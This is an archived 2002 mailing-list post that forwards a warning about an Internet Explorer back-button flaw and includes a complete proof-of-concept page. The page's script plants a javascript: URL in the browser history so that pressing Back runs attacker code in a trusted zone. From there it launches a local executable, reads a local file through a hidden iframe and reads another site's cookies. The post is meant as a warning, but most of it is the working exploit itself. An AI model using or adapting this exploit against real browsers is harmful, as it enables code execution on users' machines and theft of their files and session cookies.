FW: I'm not making this up...don't use your BACK button on your browser

Thu, 18 Apr 2002 07:41:38 -0700 

My network admin sent me this today:
Yep, the back button...that innocuous little button you hit when you get 
to a page that isn't available.  Don't use it.  There's an exploit that 
allows someone to take advantage of the way IE loads error pages.  Once 
you get on the error page, IE thinks its 'safe'.  Unfortunately, its not 
difficult to link Java script to the back button on the browser and 
execute code.  Since IE thinks it is 'safe', it runs the code.

Here's the source for an example page:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html><HEAD>

<META http-equiv=Content-Type content="text/html; charset=unicode">
<META content="MSHTML 6.00.2715.400" name=GENERATOR></HEAD>
<BODY>
<h1>Press link and then the backbutton to trigger script.</h1>
<A href="javascript:execFile('file:///c:/winnt/system32/winmine.exe')">
Run Minesweeper (c:/winnt/system32/winmine.exe Win2000 pro)</a><br>
<A href="javascript:execFile('file:///c:/windows/system32/winmine.exe')">
Run Minesweeper (c:/windows/system32/winmine.exe XP, ME etc...)</a><br>
<A href="javascript:readFile('file:///c:/test.txt')">
Read c:\test.txt (needs to be created)</a><br>
<A href="javascript:readCookie('http://www.google.com/')">
Read Google cookie</a>
<script>
// badUrl = "http://www.nonexistingdomain.se";; // Use if not XP
badUrl = "res:";
function execFile(file){
   s = '<object classid=CLSID:11111111-1111-1111-1111-111111111111 ';
   s+= 'CODEBASE='+file+'></OBJECT>';
   backBug(badUrl,s);
}
function readFile(file){
   s = '<iframe name=i src='+file+' style=display:none onload=';
   s+= 'alert(i.document.body.innerText)></iframe>';
   backBug(badUrl,s);
}

function readCookie(url){
   s = '<script>alert(document.cookie);close();<"+"/script>';
   backBug(url,s);
}

function backBug(url,payload){
   len = history.length;
   page = document.location;
   s = "javascript:if (history.length!="+len+") {";
   s+= "open('javascript:document.write(\""+payload+"\")')";
   s+= ";history.back();} else '<script>location=\""+url
   s+= "\";document.title=\""+page+"\";<"+"/script>';";
   location = s;
}
</script>
</BODY>
</html>

Hatton

______________________________________________________________________
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Reply via email to